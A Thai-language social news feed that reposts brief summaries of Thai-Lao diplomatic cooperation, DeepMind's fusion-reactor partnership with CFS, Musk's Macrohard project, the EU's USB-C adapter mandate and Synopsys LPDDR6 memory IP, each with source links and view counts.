• ไทย-ลาว มิตรภาพแน่นแฟ้น

    แม้รัฐบาลจะมีอายุการทำงานเพียงแค่ 4 เดือน และสถานการณ์ความขัดแย้งกับกัมพูชายังไม่มีทีท่าว่าจะจบลง แต่การเดินทางไปเยือนประเทศลาว ของนายอนุทิน ชาญวีรกูล นายกรัฐมนตรีและคณะเมื่อวันศุกร์ที่ผ่านมา (16 ต.ค.) ในวาระครอบรอบการสถาปนาความสัมพันธ์ทางการทูตไทย-ลาว ครบ 75 ปี ในปี 2568 แสดงให้เห็นว่าลาวยังเป็นประเทศเพื่อนบ้านที่วางใจได้ ธงชาติไทยสลับกับธงชาติลาวบริเวณประตูไช แลนด์มาร์คสำคัญของนครหลวงเวียงจันทน์ เป็นภาพที่คนไทยและชาวลาวต่างรู้สึกเป็นบวก เพราะเป็นชาติที่คนไทยแทบไม่ต้องแปลภาษาก็สื่อสารกันง่าย เปรียบดังมองตาก็รู้ใจ

    การเดินทางมาเยือนลาวในครั้งนี้ นายกรัฐมนตรีอนุทินลงนามบันทึกความเข้าใจ (MOU) ระหว่างรัฐบาลไทยและลาว 1 ฉบับ ได้แก่ เอ็มโอยูระหว่างธนาคารเพื่อการส่งออกและนำเข้าแห่งประเทศไทย (EXIM Bank) และธนาคารส่งเสริมกสิกรรมแห่ง สปป.ลาว รวมทั้งการสนับสนุนทางการเงิน 10 ล้านบาท สำหรับโครงการความร่วมมือสกัดกั้นสารตั้งต้นของการผลิตยาเสพติด ไทย-ลาว การส่งมอบเซรุ่มแก้พิษงู มูลค่า 875,000 บาท อุปกรณ์พัฒนาและฝึกอาชีพแรงงาน มูลค่า 1.49 ล้านบาท ความช่วยเหลือทางวิชาการ สำหรับงานออกแบบรายละเอียดโครงการพัฒนาระบบประปาระยะที่ 2 มูลค่าประมาณ 30 ล้านบาท

    นอกจากนี้ ยังยกระดับความร่วมมือกับลาวในด้านต่างๆ เพื่อเปลี่ยนแลนด์ล็อกเป็นแลนด์ลิงก์ เชื่อมโยงด้านคมนาคมและโลจิสติกส์ และความร่วมมือด้านอื่นๆ เช่น การเร่งแก้ปัญหาอาชญากรรมช้ามชาติ ยาเสพติด ฉ้อโกงออนไลน์ การค้ามนุษย์ โดยการตั้งศูนย์ Contact point และศูนย์ช่วยเหลือผู้เสียหายจากการค้ามนุษย์ การแก้ปัญหาหมอกควันข้ามแดน การบริหารจัดการน้ำในแม่น้ำโขงโดยใช้เทคโนโลยี ตามยุทธศาสตร์ฟ้าใส (CLEAR Sky Strategy) ยืนยันการจัดประชุม COOP ครั้งที่ 8 ส่งเสริมการค้าชายแดน เอสเอ็มอี ตั้งเป้าหมายการค้าที่ 11,000 ล้านเหรียญสหรัฐฯ ภายในปี 2570 สนับสนุนพัฒนาโครงสร้างพื้นฐาน เช่น ก่อสร้างสะพานรถไฟข้ามแม่น้ำโขงแห่งใหม่ และแผนยุทธศาสตร์ด้านโลจิสติกส์ไทย-ลาวอย่างครบวงจร ส่งเสริมการลงทุนอุตสาหกรรมสีเขียว โดยเฉพาะการผลิตไฟฟ้าจากแผงโซลาร์เซลล์ระหว่างทั้งสองประเทศ

    อีกด้านหนึ่ง ประเทศไทยและ สปป.ลาว เตรียมร่วมกันเปิดสะพานมิตรภาพไทย-ลาวแห่งที่ 5 (บึงกาฬ-บอลิคำไซ) จังหวัดบึงกาฬ ในช่วงปลายปี 2568 เพื่อเชื่อมโยงเศรษฐกิจ การค้า การลงทุน ระหว่างไทยกับลาวและภูมิภาคอินโดจีน ไปยังท่าเรือน้ำลึกในประเทศเวียดนาม เช่น ท่าเรือสากลลาว-เวียด หรือท่าเรือหวุงอ๋าง จังหวัดฮาติงห์ ถือเป็นทางออกสู่ทะเลที่ใกล้ที่สุดของลาว และเชื่อมต่อทางตอนใต้ของประเทศจีน

    #Newskit
    ไทย-ลาว มิตรภาพแน่นแฟ้น แม้รัฐบาลจะมีอายุการทำงานเพียงแค่ 4 เดือน และสถานการณ์ความขัดแย้งกับกัมพูชายังไม่มีทีท่าว่าจะจบลง แต่การเดินทางไปเยือนประเทศลาว ของนายอนุทิน ชาญวีรกูล นายกรัฐมนตรีและคณะเมื่อวันศุกร์ที่ผ่านมา (16 ต.ค.) ในวาระครอบรอบการสถาปนาความสัมพันธ์ทางการทูตไทย-ลาว ครบ 75 ปี ในปี 2568 แสดงให้เห็นว่าลาวยังเป็นประเทศเพื่อนบ้านที่วางใจได้ ธงชาติไทยสลับกับธงชาติลาวบริเวณประตูไช แลนด์มาร์คสำคัญของนครหลวงเวียงจันทน์ เป็นภาพที่คนไทยและชาวลาวต่างรู้สึกเป็นบวก เพราะเป็นชาติที่คนไทยแทบไม่ต้องแปลภาษาก็สื่อสารกันง่าย เปรียบดังมองตาก็รู้ใจ การเดินทางมาเยือนลาวในครั้งนี้ นายกรัฐมนตรีอนุทินลงนามบันทึกความเข้าใจ (MOU) ระหว่างรัฐบาลไทยและลาว 1 ฉบับ ได้แก่ เอ็มโอยูระหว่างธนาคารเพื่อการส่งออกและนำเข้าแห่งประเทศไทย (EXIM Bank) และธนาคารส่งเสริมกสิกรรมแห่ง สปป.ลาว รวมทั้งการสนับสนุนทางการเงิน 10 ล้านบาท สำหรับโครงการความร่วมมือสกัดกั้นสารตั้งต้นของการผลิตยาเสพติด ไทย-ลาว การส่งมอบเซรุ่มแก้พิษงู มูลค่า 875,000 บาท อุปกรณ์พัฒนาและฝึกอาชีพแรงงาน มูลค่า 1.49 ล้านบาท ความช่วยเหลือทางวิชาการ สำหรับงานออกแบบรายละเอียดโครงการพัฒนาระบบประปาระยะที่ 2 มูลค่าประมาณ 30 ล้านบาท นอกจากนี้ ยังยกระดับความร่วมมือกับลาวในด้านต่างๆ เพื่อเปลี่ยนแลนด์ล็อกเป็นแลนด์ลิงก์ เชื่อมโยงด้านคมนาคมและโลจิสติกส์ และความร่วมมือด้านอื่นๆ เช่น การเร่งแก้ปัญหาอาชญากรรมช้ามชาติ ยาเสพติด ฉ้อโกงออนไลน์ การค้ามนุษย์ โดยการตั้งศูนย์ Contact point และศูนย์ช่วยเหลือผู้เสียหายจากการค้ามนุษย์ การแก้ปัญหาหมอกควันข้ามแดน การบริหารจัดการน้ำในแม่น้ำโขงโดยใช้เทคโนโลยี ตามยุทธศาสตร์ฟ้าใส (CLEAR Sky Strategy) ยืนยันการจัดประชุม COOP ครั้งที่ 8 ส่งเสริมการค้าชายแดน เอสเอ็มอี ตั้งเป้าหมายการค้าที่ 11,000 ล้านเหรียญสหรัฐฯ ภายในปี 2570 สนับสนุนพัฒนาโครงสร้างพื้นฐาน เช่น ก่อสร้างสะพานรถไฟข้ามแม่น้ำโขงแห่งใหม่ และแผนยุทธศาสตร์ด้านโลจิสติกส์ไทย-ลาวอย่างครบวงจร ส่งเสริมการลงทุนอุตสาหกรรมสีเขียว โดยเฉพาะการผลิตไฟฟ้าจากแผงโซลาร์เซลล์ระหว่างทั้งสองประเทศ อีกด้านหนึ่ง ประเทศไทยและ สปป.ลาว เตรียมร่วมกันเปิดสะพานมิตรภาพไทย-ลาวแห่งที่ 5 (บึงกาฬ-บอลิคำไซ) จังหวัดบึงกาฬ ในช่วงปลายปี 2568 เพื่อเชื่อมโยงเศรษฐกิจ การค้า การลงทุน ระหว่างไทยกับลาวและภูมิภาคอินโดจีน ไปยังท่าเรือน้ำลึกในประเทศเวียดนาม เช่น ท่าเรือสากลลาว-เวียด หรือท่าเรือหวุงอ๋าง จังหวัดฮาติงห์ ถือเป็นทางออกสู่ทะเลที่ใกล้ที่สุดของลาว และเชื่อมต่อทางตอนใต้ของประเทศจีน #Newskit
    1 ความคิดเห็น 0 การแบ่งปัน 26 มุมมอง 0 รีวิว
  • “DeepMind จับมือ CFS ใช้ AI เพิ่มประสิทธิภาพเตาปฏิกรณ์ฟิวชัน SPARC” — เมื่อ AI ไม่ได้แค่เล่นหมากรุก แต่ช่วยเร่งอนาคตพลังงานสะอาดให้ใกล้ขึ้น

    Google DeepMind ประกาศความร่วมมือกับบริษัทฟิวชันพลังงานจากสหรัฐฯ อย่าง Commonwealth Fusion Systems (CFS) เพื่อใช้ AI เพิ่มประสิทธิภาพการทำงานของเตาปฏิกรณ์ฟิวชัน SPARC ซึ่งเป็นหนึ่งในโครงการที่มีเป้าหมายเพื่อผลิตพลังงานสะอาดแบบ “เกินดุล” (net energy gain) ให้ได้ภายในปี 2027

    CFS เพิ่งระดมทุนได้ถึง 863 ล้านดอลลาร์จากนักลงทุนรายใหญ่ เช่น NVIDIA, Google, Breakthrough Energy Ventures (ของ Bill Gates), Morgan Stanley, และบริษัทญี่ปุ่นอย่าง Mitsui & Co. และ Mitsubishi Corporation สะท้อนถึงความเชื่อมั่นระดับโลกในพลังงานฟิวชัน

    DeepMind จะนำเทคโนโลยี AI ที่เคยใช้ควบคุมพลาสมาใน tokamak (เตาปฏิกรณ์ฟิวชันแบบแม่เหล็ก) มาพัฒนา 3 ระบบหลักให้กับ SPARC ได้แก่:

    1️⃣ TORAX — ซอฟต์แวร์จำลองพลาสมาแบบ open-source ที่สามารถรันการทดลองจำลองนับล้านครั้งเพื่อปรับแต่งพารามิเตอร์ของเตาปฏิกรณ์

    2️⃣ AlphaEvolve — ระบบ AI ที่ใช้ reinforcement learning เพื่อค้นหาวิธีการควบคุมพลาสมาให้ได้พลังงานสูงสุด

    3️⃣ AI Navigator — ระบบควบคุมพลาสมาแบบเรียลไทม์ ที่สามารถปรับสมดุลความร้อนและแรงดันในเตาได้อย่างแม่นยำ

    เป้าหมายสูงสุดคือการสร้างระบบควบคุมอัตโนมัติที่ “ฉลาดกว่าวิศวกรมนุษย์” ในการจัดการเตาปฏิกรณ์ฟิวชัน ซึ่งจะเป็นรากฐานของโรงไฟฟ้าฟิวชันในอนาคต

    DeepMind ร่วมมือกับ CFS เพื่อเพิ่มประสิทธิภาพเตาฟิวชัน SPARC
    ใช้ AI ควบคุมพลาสมาและจำลองการทำงานของเตา

    CFS ได้รับเงินลงทุน 863 ล้านดอลลาร์จากบริษัทชั้นนำ
    เช่น Google, NVIDIA, Breakthrough Energy, Morgan Stanley ฯลฯ

    เป้าหมายคือการผลิตพลังงานฟิวชันแบบ net energy gain ภายในปี 2027
    หมายถึงผลิตพลังงานได้มากกว่าที่ใช้ในการจุดพลาสมา

    DeepMind พัฒนา 3 ระบบ AI ได้แก่ TORAX, AlphaEvolve และ AI Navigator
    ครอบคลุมทั้งการจำลอง, การเรียนรู้, และการควบคุมแบบเรียลไทม์

    ระบบ AI จะช่วยควบคุมความร้อนและแรงดันในเตา
    ป้องกันความเสียหายและเพิ่มประสิทธิภาพการผลิตพลังงาน

    https://securityonline.info/google-deepmind-partners-with-cfs-to-use-ai-for-optimizing-sparc-fusion-reactor-efficiency/
    ⚛️ “DeepMind จับมือ CFS ใช้ AI เพิ่มประสิทธิภาพเตาปฏิกรณ์ฟิวชัน SPARC” — เมื่อ AI ไม่ได้แค่เล่นหมากรุก แต่ช่วยเร่งอนาคตพลังงานสะอาดให้ใกล้ขึ้น Google DeepMind ประกาศความร่วมมือกับบริษัทฟิวชันพลังงานจากสหรัฐฯ อย่าง Commonwealth Fusion Systems (CFS) เพื่อใช้ AI เพิ่มประสิทธิภาพการทำงานของเตาปฏิกรณ์ฟิวชัน SPARC ซึ่งเป็นหนึ่งในโครงการที่มีเป้าหมายเพื่อผลิตพลังงานสะอาดแบบ “เกินดุล” (net energy gain) ให้ได้ภายในปี 2027 CFS เพิ่งระดมทุนได้ถึง 863 ล้านดอลลาร์จากนักลงทุนรายใหญ่ เช่น NVIDIA, Google, Breakthrough Energy Ventures (ของ Bill Gates), Morgan Stanley, และบริษัทญี่ปุ่นอย่าง Mitsui & Co. และ Mitsubishi Corporation สะท้อนถึงความเชื่อมั่นระดับโลกในพลังงานฟิวชัน DeepMind จะนำเทคโนโลยี AI ที่เคยใช้ควบคุมพลาสมาใน tokamak (เตาปฏิกรณ์ฟิวชันแบบแม่เหล็ก) มาพัฒนา 3 ระบบหลักให้กับ SPARC ได้แก่: 1️⃣ TORAX — ซอฟต์แวร์จำลองพลาสมาแบบ open-source ที่สามารถรันการทดลองจำลองนับล้านครั้งเพื่อปรับแต่งพารามิเตอร์ของเตาปฏิกรณ์ 2️⃣ AlphaEvolve — ระบบ AI ที่ใช้ reinforcement learning เพื่อค้นหาวิธีการควบคุมพลาสมาให้ได้พลังงานสูงสุด 3️⃣ AI Navigator — ระบบควบคุมพลาสมาแบบเรียลไทม์ ที่สามารถปรับสมดุลความร้อนและแรงดันในเตาได้อย่างแม่นยำ เป้าหมายสูงสุดคือการสร้างระบบควบคุมอัตโนมัติที่ “ฉลาดกว่าวิศวกรมนุษย์” ในการจัดการเตาปฏิกรณ์ฟิวชัน ซึ่งจะเป็นรากฐานของโรงไฟฟ้าฟิวชันในอนาคต ✅ DeepMind ร่วมมือกับ CFS เพื่อเพิ่มประสิทธิภาพเตาฟิวชัน SPARC ➡️ ใช้ AI ควบคุมพลาสมาและจำลองการทำงานของเตา ✅ CFS ได้รับเงินลงทุน 863 ล้านดอลลาร์จากบริษัทชั้นนำ ➡️ เช่น Google, NVIDIA, Breakthrough Energy, Morgan Stanley ฯลฯ ✅ เป้าหมายคือการผลิตพลังงานฟิวชันแบบ net energy gain ภายในปี 2027 ➡️ หมายถึงผลิตพลังงานได้มากกว่าที่ใช้ในการจุดพลาสมา ✅ DeepMind พัฒนา 3 ระบบ AI ได้แก่ TORAX, AlphaEvolve และ AI Navigator ➡️ ครอบคลุมทั้งการจำลอง, การเรียนรู้, และการควบคุมแบบเรียลไทม์ ✅ ระบบ AI จะช่วยควบคุมความร้อนและแรงดันในเตา ➡️ ป้องกันความเสียหายและเพิ่มประสิทธิภาพการผลิตพลังงาน https://securityonline.info/google-deepmind-partners-with-cfs-to-use-ai-for-optimizing-sparc-fusion-reactor-efficiency/
    SECURITYONLINE.INFO
    Google DeepMind Partners with CFS to Use AI for Optimizing SPARC Fusion Reactor Efficiency
    DeepMind is partnering with CFS to optimize its SPARC fusion reactor for net energy gain (Q>1) by 2027. The AI uses TORAX simulations and AlphaEvolve agents to control extreme plasma heat.
    0 ความคิดเห็น 0 การแบ่งปัน 82 มุมมอง 0 รีวิว
  • “Macrohard: โปรเจกต์ใหม่จาก Elon Musk ที่ผสานแนวคิด Apple + Microsoft” — เมื่อ xAI ตั้งเป้าสร้างแพลตฟอร์ม AI แบบครบวงจร โดยไม่ผลิตฮาร์ดแวร์เอง

    Elon Musk เปิดตัวโปรเจกต์ใหม่ชื่อ “Macrohard” ภายใต้บริษัท xAI โดยตั้งเป้าสร้างแพลตฟอร์ม AI ที่ “สามารถทำทุกอย่าง ยกเว้นผลิตฮาร์ดแวร์เอง” ซึ่งสะท้อนแนวคิดของ Apple ที่จ้างบริษัทอื่นผลิต iPhone และ Microsoft ที่เน้นการออกแบบซอฟต์แวร์และกำหนดมาตรฐาน

    Musk อธิบายว่า Macrohard จะเป็นการ “จำลองบริษัทซอฟต์แวร์ทั้งบริษัทด้วย AI agents” โดยไม่ต้องมีโรงงานผลิตของตัวเอง แต่จะกำหนดมาตรฐาน, ระบบปฏิบัติการ, และซอฟต์แวร์ให้บริษัทอื่นนำไปใช้ผลิตอุปกรณ์จริง

    แม้โมเดลนี้จะคล้ายกับ Microsoft ในแง่ของการออกใบอนุญาตซอฟต์แวร์ (licensing) แต่ก็มีความเป็น Apple ในแง่ของการควบคุมประสบการณ์ผู้ใช้และการออกแบบระบบแบบปิด

    โลโก้ Macrohard ถูกเพนต์ไว้บนหลังคาของคลัสเตอร์ซูเปอร์คอมพิวเตอร์ Colossus II ของ xAI ที่เมืองเมมฟิส รัฐเทนเนสซี ซึ่งเป็นโครงสร้างพื้นฐานหลักของโปรเจกต์นี้

    แม้ยังไม่มีรายละเอียดเชิงเทคนิคมากนัก แต่การที่ Musk ใช้คำว่า “profoundly impactful at an immense scale” ทำให้หลายฝ่ายคาดว่า Macrohard อาจเป็นก้าวสำคัญในการขยาย xAI จากโมเดล AI ไปสู่ระบบปฏิบัติการและแพลตฟอร์มเต็มรูปแบบ

    Elon Musk เปิดตัวโปรเจกต์ “Macrohard” ภายใต้ xAI
    ตั้งเป้าสร้างแพลตฟอร์ม AI โดยไม่ผลิตฮาร์ดแวร์เอง

    แนวคิดคล้าย Apple + Microsoft
    ออกแบบซอฟต์แวร์และกำหนดมาตรฐานให้บริษัทอื่นผลิต

    เป้าหมายคือ “จำลองบริษัทซอฟต์แวร์ทั้งบริษัทด้วย AI agents”
    ใช้ AI เขียนและปรับปรุงซอฟต์แวร์ระดับ production

    ใช้ซูเปอร์คอมพิวเตอร์ Colossus II เป็นโครงสร้างพื้นฐาน
    โลโก้ Macrohard ถูกเพนต์ไว้บนหลังคาคลัสเตอร์

    ยังไม่มีการเปิดรับสมัครงานภายนอกมากนัก
    คาดว่าส่วนใหญ่พัฒนาโดยทีมภายในและ AI agents

    https://www.techradar.com/pro/much-like-apple-elon-musks-macrohard-project-will-take-a-leaf-out-of-cupertinos-book-as-it-takes-on-microsoft-outsource-the-physical-produce-the-intangible
    🧠 “Macrohard: โปรเจกต์ใหม่จาก Elon Musk ที่ผสานแนวคิด Apple + Microsoft” — เมื่อ xAI ตั้งเป้าสร้างแพลตฟอร์ม AI แบบครบวงจร โดยไม่ผลิตฮาร์ดแวร์เอง Elon Musk เปิดตัวโปรเจกต์ใหม่ชื่อ “Macrohard” ภายใต้บริษัท xAI โดยตั้งเป้าสร้างแพลตฟอร์ม AI ที่ “สามารถทำทุกอย่าง ยกเว้นผลิตฮาร์ดแวร์เอง” ซึ่งสะท้อนแนวคิดของ Apple ที่จ้างบริษัทอื่นผลิต iPhone และ Microsoft ที่เน้นการออกแบบซอฟต์แวร์และกำหนดมาตรฐาน Musk อธิบายว่า Macrohard จะเป็นการ “จำลองบริษัทซอฟต์แวร์ทั้งบริษัทด้วย AI agents” โดยไม่ต้องมีโรงงานผลิตของตัวเอง แต่จะกำหนดมาตรฐาน, ระบบปฏิบัติการ, และซอฟต์แวร์ให้บริษัทอื่นนำไปใช้ผลิตอุปกรณ์จริง แม้โมเดลนี้จะคล้ายกับ Microsoft ในแง่ของการออกใบอนุญาตซอฟต์แวร์ (licensing) แต่ก็มีความเป็น Apple ในแง่ของการควบคุมประสบการณ์ผู้ใช้และการออกแบบระบบแบบปิด โลโก้ Macrohard ถูกเพนต์ไว้บนหลังคาของคลัสเตอร์ซูเปอร์คอมพิวเตอร์ Colossus II ของ xAI ที่เมืองเมมฟิส รัฐเทนเนสซี ซึ่งเป็นโครงสร้างพื้นฐานหลักของโปรเจกต์นี้ แม้ยังไม่มีรายละเอียดเชิงเทคนิคมากนัก แต่การที่ Musk ใช้คำว่า “profoundly impactful at an immense scale” ทำให้หลายฝ่ายคาดว่า Macrohard อาจเป็นก้าวสำคัญในการขยาย xAI จากโมเดล AI ไปสู่ระบบปฏิบัติการและแพลตฟอร์มเต็มรูปแบบ ✅ Elon Musk เปิดตัวโปรเจกต์ “Macrohard” ภายใต้ xAI ➡️ ตั้งเป้าสร้างแพลตฟอร์ม AI โดยไม่ผลิตฮาร์ดแวร์เอง ✅ แนวคิดคล้าย Apple + Microsoft ➡️ ออกแบบซอฟต์แวร์และกำหนดมาตรฐานให้บริษัทอื่นผลิต ✅ เป้าหมายคือ “จำลองบริษัทซอฟต์แวร์ทั้งบริษัทด้วย AI agents” ➡️ ใช้ AI เขียนและปรับปรุงซอฟต์แวร์ระดับ production ✅ ใช้ซูเปอร์คอมพิวเตอร์ Colossus II เป็นโครงสร้างพื้นฐาน ➡️ โลโก้ Macrohard ถูกเพนต์ไว้บนหลังคาคลัสเตอร์ ✅ ยังไม่มีการเปิดรับสมัครงานภายนอกมากนัก ➡️ คาดว่าส่วนใหญ่พัฒนาโดยทีมภายในและ AI agents https://www.techradar.com/pro/much-like-apple-elon-musks-macrohard-project-will-take-a-leaf-out-of-cupertinos-book-as-it-takes-on-microsoft-outsource-the-physical-produce-the-intangible
    0 ความคิดเห็น 0 การแบ่งปัน 92 มุมมอง 0 รีวิว
  • “EU บังคับใช้ USB-C สำหรับอะแดปเตอร์ทุกชนิดภายในปี 2028 — พร้อมติดฉลากกำลังไฟบนสายและหัวชาร์จ”

    สหภาพยุโรปออกกฎหมายใหม่ที่กำหนดให้ “External Power Supplies” (EPS) หรืออะแดปเตอร์ไฟฟ้าทุกชนิดต้องใช้พอร์ต USB-C พร้อมสายถอดได้ภายในปี 2028 โดยครอบคลุมอุปกรณ์หลากหลายประเภท เช่น คอนโซลเกม, จอมอนิเตอร์, เราเตอร์, กล่องรับสัญญาณ, เครื่องชาร์จไร้สาย และแม้แต่ PoE injectors

    เป้าหมายหลักคือการสร้างความ “interoperability” หรือความเข้ากันได้ระหว่างอุปกรณ์ และส่งเสริมความยั่งยืน โดยผู้ใช้สามารถใช้สายและหัวชาร์จเดียวกันกับหลายอุปกรณ์ได้

    กฎหมายยังบังคับให้ผู้ผลิตแสดง “กำลังไฟ” (power rating) บนตัวอะแดปเตอร์, พอร์ตชาร์จ และสายไฟ เพื่อป้องกันการโฆษณาเกินจริง และช่วยให้ผู้ใช้เลือกใช้อุปกรณ์ได้อย่างปลอดภัย

    นอกจากนี้ EPS ที่จ่ายไฟเกิน 10W ต้องผ่านเกณฑ์ประสิทธิภาพขั้นต่ำทั้งในสภาวะโหลดต่ำ, เฉลี่ย และไม่มีโหลด ส่วนแท่นชาร์จไร้สายต้องลดการใช้พลังงานขณะ idle และมีวงจรจ่ายไฟแยกต่างหากเพื่อให้สามารถเปลี่ยนหรือใช้ซ้ำได้

    อุปกรณ์บางประเภทได้รับการยกเว้น เช่น UPS, อุปกรณ์ทางการแพทย์, ของเล่นบางชนิด, สกู๊ตเตอร์ไฟฟ้า, ระบบไฟฉุกเฉิน และอุปกรณ์ที่ใช้ในสภาพแวดล้อมเปียก

    EU คาดว่ากฎหมายนี้จะช่วยลดการใช้พลังงานได้ถึง 1,070 TWh ต่อปีภายในปี 2030 โดยอิงจากข้อมูลว่ามี EPS ขายมากถึง 400 ล้านชิ้นต่อปี

    EU ออกกฎหมายบังคับให้ EPS ทุกชนิดใช้ USB-C พร้อมสายถอดได้ภายในปี 2028
    ครอบคลุมอุปกรณ์หลากหลาย เช่น คอนโซล, เราเตอร์, กล่องรับสัญญาณ ฯลฯ

    ต้องแสดงกำลังไฟบนตัวอะแดปเตอร์, พอร์ต และสาย
    เพื่อความปลอดภัยและความโปร่งใสในการใช้งาน

    EPS ที่จ่ายไฟเกิน 10W ต้องผ่านเกณฑ์ประสิทธิภาพขั้นต่ำ
    ทั้งในโหลดต่ำ, เฉลี่ย และไม่มีโหลด

    แท่นชาร์จไร้สายต้องลด idle power และมีวงจรจ่ายไฟแยก
    เพื่อให้สามารถเปลี่ยนหรือใช้ซ้ำได้

    มีการออกโลโก้ “Common Charger” เพื่อระบุอุปกรณ์ที่ผ่านเกณฑ์
    ช่วยให้ผู้ใช้เลือกใช้งานได้ง่ายขึ้น

    คาดว่าจะลดการใช้พลังงานได้ 1,070 TWh ต่อปีภายในปี 2030
    จากการลดจำนวน EPS ที่ผลิตและใช้งานซ้ำ

    https://www.tomshardware.com/tech-industry/power-bricks-and-wall-warts-must-be-usb-c-by-2028-new-eu-legislation-also-adds-power-rating-labels-for-power-units-and-cables
    🔌 “EU บังคับใช้ USB-C สำหรับอะแดปเตอร์ทุกชนิดภายในปี 2028 — พร้อมติดฉลากกำลังไฟบนสายและหัวชาร์จ” สหภาพยุโรปออกกฎหมายใหม่ที่กำหนดให้ “External Power Supplies” (EPS) หรืออะแดปเตอร์ไฟฟ้าทุกชนิดต้องใช้พอร์ต USB-C พร้อมสายถอดได้ภายในปี 2028 โดยครอบคลุมอุปกรณ์หลากหลายประเภท เช่น คอนโซลเกม, จอมอนิเตอร์, เราเตอร์, กล่องรับสัญญาณ, เครื่องชาร์จไร้สาย และแม้แต่ PoE injectors เป้าหมายหลักคือการสร้างความ “interoperability” หรือความเข้ากันได้ระหว่างอุปกรณ์ และส่งเสริมความยั่งยืน โดยผู้ใช้สามารถใช้สายและหัวชาร์จเดียวกันกับหลายอุปกรณ์ได้ กฎหมายยังบังคับให้ผู้ผลิตแสดง “กำลังไฟ” (power rating) บนตัวอะแดปเตอร์, พอร์ตชาร์จ และสายไฟ เพื่อป้องกันการโฆษณาเกินจริง และช่วยให้ผู้ใช้เลือกใช้อุปกรณ์ได้อย่างปลอดภัย นอกจากนี้ EPS ที่จ่ายไฟเกิน 10W ต้องผ่านเกณฑ์ประสิทธิภาพขั้นต่ำทั้งในสภาวะโหลดต่ำ, เฉลี่ย และไม่มีโหลด ส่วนแท่นชาร์จไร้สายต้องลดการใช้พลังงานขณะ idle และมีวงจรจ่ายไฟแยกต่างหากเพื่อให้สามารถเปลี่ยนหรือใช้ซ้ำได้ อุปกรณ์บางประเภทได้รับการยกเว้น เช่น UPS, อุปกรณ์ทางการแพทย์, ของเล่นบางชนิด, สกู๊ตเตอร์ไฟฟ้า, ระบบไฟฉุกเฉิน และอุปกรณ์ที่ใช้ในสภาพแวดล้อมเปียก EU คาดว่ากฎหมายนี้จะช่วยลดการใช้พลังงานได้ถึง 1,070 TWh ต่อปีภายในปี 2030 โดยอิงจากข้อมูลว่ามี EPS ขายมากถึง 400 ล้านชิ้นต่อปี ✅ EU ออกกฎหมายบังคับให้ EPS ทุกชนิดใช้ USB-C พร้อมสายถอดได้ภายในปี 2028 ➡️ ครอบคลุมอุปกรณ์หลากหลาย เช่น คอนโซล, เราเตอร์, กล่องรับสัญญาณ ฯลฯ ✅ ต้องแสดงกำลังไฟบนตัวอะแดปเตอร์, พอร์ต และสาย ➡️ เพื่อความปลอดภัยและความโปร่งใสในการใช้งาน ✅ EPS ที่จ่ายไฟเกิน 10W ต้องผ่านเกณฑ์ประสิทธิภาพขั้นต่ำ ➡️ ทั้งในโหลดต่ำ, เฉลี่ย และไม่มีโหลด ✅ แท่นชาร์จไร้สายต้องลด idle power และมีวงจรจ่ายไฟแยก ➡️ เพื่อให้สามารถเปลี่ยนหรือใช้ซ้ำได้ ✅ มีการออกโลโก้ “Common Charger” เพื่อระบุอุปกรณ์ที่ผ่านเกณฑ์ ➡️ ช่วยให้ผู้ใช้เลือกใช้งานได้ง่ายขึ้น ✅ คาดว่าจะลดการใช้พลังงานได้ 1,070 TWh ต่อปีภายในปี 2030 ➡️ จากการลดจำนวน EPS ที่ผลิตและใช้งานซ้ำ https://www.tomshardware.com/tech-industry/power-bricks-and-wall-warts-must-be-usb-c-by-2028-new-eu-legislation-also-adds-power-rating-labels-for-power-units-and-cables
    0 ความคิดเห็น 0 การแบ่งปัน 94 มุมมอง 0 รีวิว
  • “Synopsys เปิดตัว LPDDR6 IP บนเทคโนโลยี TSMC N2P — แบนด์วิดท์พุ่งแตะ 86 GB/s”

    Synopsys ประกาศความสำเร็จในการ “bring-up” หรือเปิดใช้งานซิลิคอนจริงของ IP หน่วยความจำ LPDDR6 บนเทคโนโลยีการผลิตระดับ 2 นาโนเมตร N2P ของ TSMC ซึ่งถือเป็นก้าวสำคัญในการพัฒนา IP ที่พร้อมให้ลูกค้านำไปใช้งานจริง

    LPDDR6 IP ดังกล่าวประกอบด้วยสองส่วนหลัก: ตัวควบคุม (controller) และอินเทอร์เฟซ PHY โดยตัวควบคุมรองรับโปรโตคอล JEDEC, การควบคุมเวลา (timing control) และโหมดประหยัดพลังงาน ส่วน PHY ถูกสร้างขึ้นบนวงจรอนาล็อกและ I/O ของ N2P พร้อมใช้ metal stack และไลบรารีเฉพาะของ N2P

    Synopsys ระบุว่า IP นี้สามารถทำความเร็วได้ถึง 86 GB/s ซึ่งใกล้เคียงกับมาตรฐาน JEDEC ที่ 10.667 Gb/s ต่อ pin โดยมีเป้าหมายสูงสุดที่ 14.4 Gb/s ต่อ pin หรือราว 115 GB/s เมื่อรวมทุกช่องสัญญาณ

    ข้อได้เปรียบของการใช้ N2P คือประสิทธิภาพด้านพลังงาน (PPA) ที่ดีขึ้น ทำให้หน่วยความจำใช้พลังงานต่อบิตน้อยลง และมีขนาดเล็กลง เหมาะสำหรับอุปกรณ์ที่ต้องการประสิทธิภาพสูงแต่ประหยัดพลังงาน เช่น AI บนอุปกรณ์ (on-device AI) และแพลตฟอร์มพกพา

    Synopsys คาดว่า LPDDR6 จะกลายเป็นมาตรฐานหลักในปีหน้า โดยมีผู้ผลิตชิปและอุปกรณ์หลายรายเตรียมนำไปใช้งาน

    Synopsys เปิดตัว LPDDR6 IP ที่ผ่านการ bring-up บนเทคโนโลยี TSMC N2P
    หมายถึงการเปิดใช้งานซิลิคอนจริงสำเร็จ

    IP ประกอบด้วย controller และ PHY interface
    รองรับโปรโตคอล JEDEC และโหมดประหยัดพลังงาน

    ความเร็วสูงสุดที่ทำได้คือ 86 GB/s
    ใกล้เคียงกับมาตรฐาน JEDEC ที่ 10.667 Gb/s ต่อ pin

    ใช้เทคโนโลยี N2P ของ TSMC ที่มี PPA สูง
    ช่วยลดพลังงานต่อบิตและขนาดของชิป

    เหมาะสำหรับ on-device AI และแพลตฟอร์มประหยัดพลังงาน
    เช่น สมาร์ตโฟน, แท็บเล็ต, หรืออุปกรณ์ edge AI

    LPDDR6 คาดว่าจะกลายเป็นมาตรฐานหลักในปี 2026
    ผู้ผลิตชิปหลายรายเตรียมนำไปใช้งาน

    https://wccftech.com/synopsys-unveils-silicon-bring-up-of-lpddr6-ip-on-tsmc-n2p-node/
